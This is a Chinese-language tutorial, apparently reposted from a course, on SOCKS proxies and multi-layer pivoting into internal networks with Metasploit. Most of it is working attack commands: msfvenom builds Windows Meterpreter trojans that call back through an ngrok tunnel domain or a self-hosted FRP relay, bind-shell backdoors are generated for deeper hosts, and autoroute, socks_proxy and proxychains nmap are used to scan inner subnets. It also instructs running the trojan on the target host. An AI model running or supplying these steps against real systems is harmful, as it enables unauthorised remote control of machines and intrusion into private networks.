內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).
Socks 代理又稱全能代理,就像有很多跳線的轉(zhuǎn)接板,它只是簡單地將一端的系統(tǒng)連接到另外一端。支持多種協(xié)議,包括http、ftp請求及其它類型的請求。它分socks 4 和socks 5兩種類型,socks 4只支持TCP協(xié)議而socks 5支持TCP/UDP協(xié)議,還支持各種身份驗證機制等協(xié)議。其標(biāo)準(zhǔn)端口為1080.
目錄:
內(nèi)網(wǎng)安全:Socks 代理 技術(shù).
兩個內(nèi)網(wǎng)通訊上線( Ngrok )
(1)開通隧道:
(2)下載客戶端:
(3)生成一個程序后門:
(4)進(jìn)行監(jiān)聽:(kali)
兩個內(nèi)網(wǎng)通訊上線( Frp 自建跳板 )
(1)跳板環(huán)境搭建:
(2)生成程序后面:
(3)進(jìn)行監(jiān)聽:(kali)
本地代理:( MSF?跳板多個內(nèi)網(wǎng)主機系列)
第二層內(nèi)網(wǎng)代理:
(1)信息收集及配置訪問:
(2)開啟本地代理:
(3)內(nèi)網(wǎng)掃描:
(4)瀏覽器訪問:
第三層內(nèi)網(wǎng)代理:
(1)生成正向程序后門:
(2)進(jìn)行監(jiān)聽:
(3)信息收集及配置訪問:
(4)開啟本地代理:
第四層內(nèi)網(wǎng)滲透:
(1)生成正向程序后門:
?(2)進(jìn)行監(jiān)聽:
代理解決的問題:(1)內(nèi)網(wǎng)有外網(wǎng) (2)內(nèi)網(wǎng)有過濾 (3)內(nèi)網(wǎng)無外網(wǎng)
兩個內(nèi)網(wǎng)通訊上線( Ngrok )
開通隧道工具:https://www.ngrok.cc/user.html
理解:二個內(nèi)網(wǎng)主機不能相互連接的,這樣就可以通過開通的隧道進(jìn)行連接.
(開通的隧道就是在外網(wǎng)開通一個域名:當(dāng)目標(biāo)訪問這個域名,則會將數(shù)據(jù)返還回來到kali中)
(1)開通隧道:
(2)下載客戶端:
解壓放到 kali 中:(切換的剛剛下載的文件目錄中)
(1)./sunny clientid 115735315695 // 執(zhí)行
./sunny clientid 隧道的IP
(3)生成一個程序后門:(木馬)
msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe
(4)進(jìn)行監(jiān)聽:(kali)
(1)msfconsole
(2)use exploit/multi/handler
(3)set payload windows/meterpreter/reverse_http
(4)set lhost 192.168.0.106 // 本地的 IP 地址
(5)set lport 4444 // 本地的 端口.
(6)exploit
兩個內(nèi)網(wǎng)通訊上線( Frp 自建跳板 )
(1)跳板環(huán)境搭建:
需要有自己的服務(wù)器,有來搭建跳板.
【服務(wù)器 和 控制端】需要下載的工具:https://github.com/fatedier/frp/releases
服務(wù)器修改配置文件 frps.ini:
[common]
bind_port = 6677 // 這個端口修改為 服務(wù)器 開放的就行
啟動服務(wù)端:【切換在下載的目錄并執(zhí)行】
./frps -c ./frps.ini
控制端修改配置文件 frpc.ini:
[common]
server_addr = 云主機 IP 地址
server_port = 6677 // frpc 工作端口,必須和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 // 轉(zhuǎn)發(fā)給本機的 5555
remote_port = 6000 // 服務(wù)端用 6000 端口轉(zhuǎn)發(fā)給本機
啟動客戶端:【切換在下載的目錄并執(zhí)行】
./frpc -c ./frpc.ini
(2)生成程序后面:(木馬)
msfvenom -p windows/meterpreter/reverse_tcp lhost=服務(wù)器(公網(wǎng))的IP地址 lport=6000 -f exe -o frp.exe
(3)進(jìn)行監(jiān)聽:(kali)
(1)msfconsole
(2)use exploit/multi/handler
(3)set payload windows/meterpreter/reverse_tcp
(4)set LHOST 127.0.0.1
(5)set LPORT 5555 // 本機監(jiān)聽的端口【和控制端的一樣】
(6)exploit
然后把程序后門(木馬)放在目標(biāo)主機上執(zhí)行就行.
本地代理:( MSF?跳板多個內(nèi)網(wǎng)主機系列)
第二層內(nèi)網(wǎng)代理:
(1)信息收集及配置訪問:
(1)run get_local_subnets // 獲取網(wǎng)絡(luò)接口
(2)run autoroute -p // 查看路由地址
(3)run autoroute -s 10.0.20.0/24 // 添加地二層內(nèi)網(wǎng)的路由網(wǎng)段.
或
(3)run post/multi/manage/autoroute // 自動添加,目前所有路由網(wǎng)段
(2)開啟本地代理:
background // 掛起會話
如果是msf6,使用代理模板為:
use auxiliary/server/socks_proxy
如果是msf5,使用代理模板為:
use auxiliary/server/socks4a
(1)set srvport 2222 // 設(shè)置本地代理端口為2222
(2)exploit // 運行
(3)內(nèi)網(wǎng)掃描:
打開 /etc/proxychains4.conf 文件:
socks4 192.168.0.106 2222 // 添加 本地的代理和端口
進(jìn)行掃描:
proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80
-Pn:掃描主機檢測其是否受到數(shù)據(jù)包過濾軟件或防火墻的保護(hù).
-sT:掃描 TCP 數(shù)據(jù)包已建立的連接 connect
(4)瀏覽器訪問:
第三層內(nèi)網(wǎng)代理:
(1)生成正向程序后門:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe
(2)進(jìn)行監(jiān)聽:
要在和上面一樣的 msf 會話中執(zhí)行.
(1)use exploit/multi/handler
(2)set payload windows/x64/meterpreter/bind_tcp
(3)set rhost 10.0.20.99 // 第二層內(nèi)網(wǎng)的 IP 地址
(4)set lport 54321 // 和程序后面(木馬)一樣的端口
(5)exploit
(3)信息收集及配置訪問:
(1)run get_local_subnets // 獲取網(wǎng)絡(luò)接口
(2)run autoroute -p // 查看路由地址
(3)run post/multi/manage/autoroute // 自動添加,目前所有路由網(wǎng)段.
(4)開啟本地代理:
background // 掛起會話
如果是msf6,使用代理模板為:
use auxiliary/server/socks_proxy
如果是msf5,使用代理模板為:
use auxiliary/server/socks4a
(1)set srvport 6666 // 默認(rèn)端口6666
(2)exploit // 運行
第四層內(nèi)網(wǎng)滲透:
(1)生成正向程序后門:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe
?(2)進(jìn)行監(jiān)聽:
要在和上面一樣的 msf 會話中執(zhí)行.
(1)use exploit/multi/handler
(2)set payload windows/x64/meterpreter/bind_tcp
(3)set rhost 10.0.10.110 // 第二層內(nèi)網(wǎng)的 IP 地址
(4)set lport 9876 // 和程序后面(木馬)一樣的端口
(5)exploit
? ? ??
? ? ?
? ?文章來源:http://www.zghlxwxcb.cn/news/detail-480681.html
學(xué)習(xí)鏈接:第70天:內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)_嗶哩嗶哩_bilibili文章來源地址http://www.zghlxwxcb.cn/news/detail-480681.html
到了這里,關(guān)于內(nèi)網(wǎng)安全:Socks 代理 || 本地代理 技術(shù).的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!